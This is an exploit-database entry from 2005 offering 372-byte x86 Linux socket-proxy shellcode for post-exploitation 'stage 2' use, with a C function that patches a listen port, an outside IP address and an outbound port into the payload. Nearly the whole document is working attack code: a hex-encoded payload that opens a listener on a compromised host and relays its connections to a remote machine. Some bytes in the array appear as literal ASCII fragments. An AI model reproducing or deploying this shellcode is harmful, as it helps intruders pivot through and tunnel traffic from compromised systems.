linux/x86 socket-proxy shellcode 372 bytes

2005-12-28T00:00:00
ID EDB-ID:13402
Type exploitdb
Reporter xort
Modified 2005-12-28T00:00:00

Description

linux/x86 socket-proxy shellcode 372 bytes. Shellcode exploit for lin_x86 platform

                                        
                                            /*---------------------------------------------------------------------------*
 *                372 byte socket-proxy shellcode                            *
 *              by Russell Sanford - xort@tty64.org                          *
 *---------------------------------------------------------------------------*
 *    filename: x86-linux-bounce-proxy.c                                     *
 *        date: 12/23/2005                                                   *
 *        info: Compiled with DTP Project.                                   *
 * discription: This is a x86-linux proxy shellcode. This is probably best   *
 * 	        used in stage 2 situations. The syntax for invoking the      *
 * 	        patchcode is as follows:                                     *
 *                                                                           *
 * 		patchcode(shellcode,31337,"11.22.33.44",80);                 *
 *                                                                           *
 * 		Where 31337 is the port to listen to on the remote host      *
 *---------------------------------------------------------------------------*/

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd"
"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea"
"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01"
"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0"
"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b"
"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1"
"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8"
"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2"
"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff"
"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c"
"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c"
"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88";

int find_safe_offset(int INT_A) {

	int INT_B=0;
	
	do {
		INT_A -= 0x01010101;	INT_B += 0x01010101;
	}
	while ( ((INT_A & 0x000000ff) == 0) || 
		((INT_A & 0x0000ff00) == 0) || 
		((INT_A & 0x00ff0000) == 0) ||
		((INT_A & 0xff000000) == 0) );

	return INT_B;
}

void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) {
	
	int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2);
	int PORT_IN_B = find_safe_offset(PORT_IN_A);	

	int IP_A = inet_addr(IP);
	int IP_B = find_safe_offset(IP_A);

	int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2);
	int PORT_OUT_B = find_safe_offset(PORT_OUT_A);	

	*(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B);
	*(int *)&shellcode[141] = PORT_IN_B;

	*(int *)&shellcode[205] = (IP_A - IP_B);
	*(int *)&shellcode[212] = IP_B;
	
	*(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B);
	*(int *)&shellcode[224] = PORT_OUT_B;

}

// milw0rm.com [2005-12-28]